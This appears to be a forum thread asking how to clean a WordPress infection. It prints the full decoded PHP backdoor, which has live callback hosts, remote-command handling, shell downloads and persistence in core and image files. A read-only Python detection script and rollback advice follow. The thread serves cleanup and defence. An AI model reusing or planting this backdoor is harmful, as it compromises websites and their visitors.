I don’t know the name, but it places .htaccess everywhere; how do I remove the virus?
This is the second time I've had this infection. As far as I understand, the ultimate goal of the virus is to place .htaccess everywhere so that there is a 403 error everywhere, and then either get in touch or simply offer to unlock it for money.
I scan with an antivirus and I deleted all the malicious files, but one file stubbornly refuses to be deleted: index.php in the root folder. The malicious code itself is obfuscated; decoding it shows this:
<?php
error_reporting(0);
// Host that serves the injected content for ordinary page requests (from the decoded sample).
$go_domain = "om814-2.thecutecar.online";
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : "";
$useragent = $_SERVER['HTTP_USER_AGENT'] ? $_SERVER['HTTP_USER_AGENT'] : "";
$userip = '';
@$timezone_out = date_default_timezone_get();
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $userip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $userip = $_SERVER['REMOTE_ADDR'];
}
$ips = explode(",", $userip);
$userip = trim(current($ips));
$http = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
// Visitor details (host, URI, referer, user agent, language, IP) are forwarded to the callback
// host, which decides per visitor what is served: cloaked content, a 404, a 301 redirect or a 500.
$index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s";
$sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
$uri_script = "";
if (strstr($uri, ".php")) {
    $uri_arr = explode(".php", $uri);
    $uri_script = $uri_arr[0] . ".php?";
    $uri = $uri_arr[1];
    $uri = str_replace("?", "/", $uri);
}
// Remote control through the unauthenticated ?ac=write|check|sitemap|robots parameter.
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    $index_name = basename($_SERVER['SCRIPT_NAME']);
    write($index_name);
    echo "write done!";
    exit();
} elseif ($action != "" && $action == "check") {
    check();
    exit();
} elseif ($action != "" && $action == "sitemap") {
    $sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml";
    $contents = file_get_contents($sitemap);
    echo $contents;
    exit();
} elseif ($action != "" && $action == "robots") {
    // Overwrites robots.txt with 80-99 fake Sitemap entries that point at sitemapN.xml.
    $data = 'User-agent: *
Allow: /';
    $uri_script = trim($uri_script);
    if ($uri_script != "" && $uri_script != "/index.php?") {
        $data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap.xml";
    } else {
        $data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap.xml";
    }
    $num = mt_rand(80, 99);
    for ($i = 0; $i < $num; $i++) {
        if (trim($uri_script) != "" && $uri_script != "/index.php?") {
            $data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap$i.xml";
        } else {
            $data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap$i.xml";
        }
    }
    @chmod("robots.txt", 0755);
    file_put_contents("robots.txt", $data);
    echo "robots write done!!";
    exit();
}
// The regex on this line was mangled by an e-mail-obfuscation artifact in the post ("[email protected]");
// it is reconstructed here from the robots handler above, which advertises sitemapN.xml.
if (preg_match('@^/sitemap(\d+)\.xml$@', $uri)) {
    $request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language));
    $content = get($request);
    @header("Content-type: text/xml");
    if (trim($uri_script) != "") {
        $content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
    }
    $date_str = date("Y-m-d\TH:i:sP", time());
    $content = str_replace("{###data_str###}", $date_str, $content);
    echo trim($content);
    exit();
} elseif (substr($uri, -4) == ".css") {
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
    $content = get($request);
    if (strstr($content, 'okhtmlgetcontent')) {
        @header("Content-type: text/css; charset=utf-8");
        $content = str_replace("okhtmlgetcontent", '', $content);
        echo trim($content);
        exit();
    }
} else {
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
    $content = get($request);
    if (trim($uri_script) != "") {
        $content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
    }
    $date_str = date("Y-m-d\TH:i:sP", time());
    $content = str_replace("{#date_str}", $date_str, $content);
    // Marker strings in the callback response select the behaviour; with no marker the
    // normal site continues to load, which is why the infection is easy to miss.
    if (strstr($content, 'okhtmlgetcontent')) {
        @header("Content-type: text/html; charset=utf-8");
        $content = str_replace("okhtmlgetcontent", '', $content);
        echo trim($content);
        exit();
    } else if (strstr($content, 'getcontent404page')) {
        @header('HTTP/1.1 404 Not Found');
        echo "404 Not Found";
        exit();
    } else if (strstr($content, 'getcontent301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $content = str_replace("getcontent301page", '', $content);
        header('Location: ' . trim($content));
        exit();
    } else if (strstr($content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        $content = str_replace("getcontent500page", '', $content);
        echo "500 Internal Server Error";
        exit();
    }
}
// Persistence: drops two shells, hides copies of the clean index.php and .htaccess inside
// image files, and splices loader stubs into two WordPress core files. These are the paths
// to inspect and restore from a clean package during cleanup.
function write($index_name) {
    $write1 = get("http://hello.firstguide.xyz/write1.txt");
    $write2 = get("http://hello.firstguide.xyz/write2.txt");
    $shell_postfs = get("http://hello.firstguide.xyz/mm1.txt");
    $shell_load = get("http://hello.firstguide.xyz/mm2.txt");
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/index.php";
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    if ($index_name != "index.php") {
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
    }
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
// Replaces .htaccess with a version fetched from the callback host and leaves it read-only
// (0444); this is the step that produces the site-wide 403 described in the question.
function check() {
    $new_ht_content = get("http://hello.firstguide.xyz/shl/htaccess.txt");
    @chmod(".htaccess", 0755);
    $ht_content = file_get_contents(".htaccess");
    file_put_contents(".htaccess", $new_ht_content);
    @chmod(".htaccess", 0444);
}
// Fetches a URL, falling back to cURL when allow_url_fopen is disabled.
function get($url) {
    $contents = @file_get_contents($url);
    if (!$contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $contents = curl_exec($ch);
        curl_close($ch);
    }
    return $contents;
}
function is_https() {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}
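Because the decoded sample hard-codes where it writes its backups, shells and loader stubs, a cleanup can start by checking exactly those paths. The triage scan below is an added example for this thread, not code from the poster or from any product. Every indicator it looks for is taken from the decoded sample above: the drop paths used by write(), the 0444 .htaccess left by check(), the robots.txt padded with 80-99 Sitemap lines, the two callback domains, and the base64("./index.php") string that write() rewrites inside the loader stubs. The sample tree it builds for the demo is constructed, `example.test` is a placeholder host, and the script only reads and reports; it never deletes anything.

```python
"""
Triage scan for the .htaccess-locking WordPress infection decoded in the question.

Added example for this thread, not code from the poster or from any vendor tool.
Every indicator is taken from the decoded sample: the fixed drop paths used by its
write() and check() functions, the two callback domains, the clean-file backups
written into image files, the base64("./index.php") marker the loader stubs carry,
and the .htaccess / robots.txt side effects. It reads and reports only.
"""
import base64
import os
import re
import stat
import tempfile
from pathlib import Path

# Drop locations hard-coded in the sample's write() function.
DROPPED_FILES = [
    "css/load.php",                                 # $shell_load
    "wp-includes/SimplePie/index.php",              # $shell_postfs
    "wp-admin/images/arrow-lefts.png",              # copy of the original index.php
    "wp-admin/images/arrow-rights.png",             # copy of the original .htaccess
    "wp-includes/images/smilies/icon_devil.gif",    # second copy of index.php
    "wp-includes/images/smilies/icon_crystal.gif",  # second copy of .htaccess
]
# Core files that write() prepends/appends its loader stubs to.
PATCHED_CORE = {"wp-includes/template-loader.php", "wp-includes/load.php"}
# write() rewrites base64("./index.php") inside the stubs, so the stubs contain it.
STUB_MARKER = base64.b64encode(b"./index.php")  # b"Li9pbmRleC5waHA="
# Callback hosts that appear literally in the decoded sample.
CALLBACK_HOSTS = [b"thecutecar.online", b"firstguide.xyz"]
# Extensions that should never carry PHP code.
MEDIA_SUFFIXES = {".png", ".gif", ".jpg", ".jpeg", ".ico"}
PHP_TAG = re.compile(rb"<\?php|<\?=")


def _read(path: Path, limit: int = 2_000_000) -> bytes:
    try:
        with path.open("rb") as fh:
            return fh.read(limit)
    except OSError:
        return b""


def scan_wordpress_root(root: str) -> list[str]:
    """Return human-readable findings for the tree under root (empty list = nothing matched)."""
    base = Path(root)
    findings = []
    for rel in DROPPED_FILES:                          # 1. known drop paths
        if (base / rel).is_file():
            findings.append(f"dropped file present: {rel}")
    ht = base / ".htaccess"                            # 2. check() leaves .htaccess at 0444
    if ht.is_file() and stat.S_IMODE(ht.stat().st_mode) == 0o444:
        findings.append(".htaccess is mode 0444 (matches check())")
    robots = base / "robots.txt"                       # 3. robots handler writes 80-99 Sitemap lines
    if robots.is_file():
        n = len(re.findall(rb"^Sitemap:", _read(robots), re.M))
        if n >= 50:
            findings.append(f"robots.txt lists {n} Sitemap entries")
    for dirpath, _dirs, files in os.walk(base):        # 4. content checks over the whole tree
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(base).as_posix()
            data = _read(p)
            if p.suffix.lower() in MEDIA_SUFFIXES and PHP_TAG.search(data):
                findings.append(f"PHP code inside media file: {rel}")
            if rel in PATCHED_CORE and STUB_MARKER in data:
                findings.append(f"loader stub marker in core file: {rel}")
            hit = next((h for h in CALLBACK_HOSTS if h in data), None)
            if hit is not None:
                findings.append(f"callback host {hit.decode()} referenced in {rel}")
    return sorted(findings)


def build_constructed_sample(root: str, infected: bool) -> None:
    """Lay out a tiny constructed WordPress-like tree; infected=True mimics write() + check()."""
    base = Path(root)
    for rel in ("wp-includes/SimplePie", "wp-admin/images", "wp-includes/images/smilies", "css"):
        (base / rel).mkdir(parents=True, exist_ok=True)
    (base / "index.php").write_bytes(b"<?php require __DIR__ . '/wp-blog-header.php';\n")
    (base / "wp-includes/load.php").write_bytes(b"<?php // core\n")
    (base / "wp-includes/template-loader.php").write_bytes(b"<?php // core\n")
    (base / ".htaccess").write_bytes(b"# BEGIN WordPress\n")
    (base / "robots.txt").write_bytes(b"User-agent: *\nAllow: /\n")
    if not infected:
        return
    # Constructed stand-ins for the dropped payloads (the real ones are fetched remotely).
    (base / "css/load.php").write_bytes(b"<?php // stand-in for mm2.txt from hello.firstguide.xyz\n")
    (base / "wp-admin/images/arrow-lefts.png").write_bytes(b"<?php // backup of the clean index.php\n")
    (base / "wp-includes/load.php").write_bytes(
        b"<?php // core\n?><?php eval(base64_decode('" + STUB_MARKER + b"'));\n")
    sitemaps = b"".join(b"Sitemap: http://example.test/sitemap%d.xml\n" % i for i in range(85))
    (base / "robots.txt").write_bytes(b"User-agent: *\nAllow: /\n" + sitemaps)
    (base / ".htaccess").write_bytes(b"Require all denied\n")
    os.chmod(base / ".htaccess", 0o444)


def demo(infected: bool = True) -> list[str]:
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp, infected)
        return scan_wordpress_root(tmp)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run `scan_wordpress_root('/path/to/docroot')` against a copy of the site. A hit on the core-file marker means wp-includes/load.php and wp-includes/template-loader.php should be replaced from a clean WordPress package rather than edited, and the image files under wp-admin/images and wp-includes/images/smilies hold the sample's copies of the original index.php and .htaccess, which helps when deciding what a clean state looked like.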
Insertion into the index through some kind of shell. Automatic antivirus and plugins are not able to detect all of them; they only skim the surface.
Tips like adding a protection plugin such as Wordfence or Sucuri don't work here either. They are more or less effective before a compromise, not after.
In general, there are only two options, and the first one can't always help.
1. A deep rollback, to before the date the viruses appeared, preferably much earlier: two months.
Then, after the rollback, update WP, update the plugins, and change the admin passwords and the database password.
2. Turn to a specialist like me (I specialize in removal and protection, with a 9-month warranty on WP), who will search manually.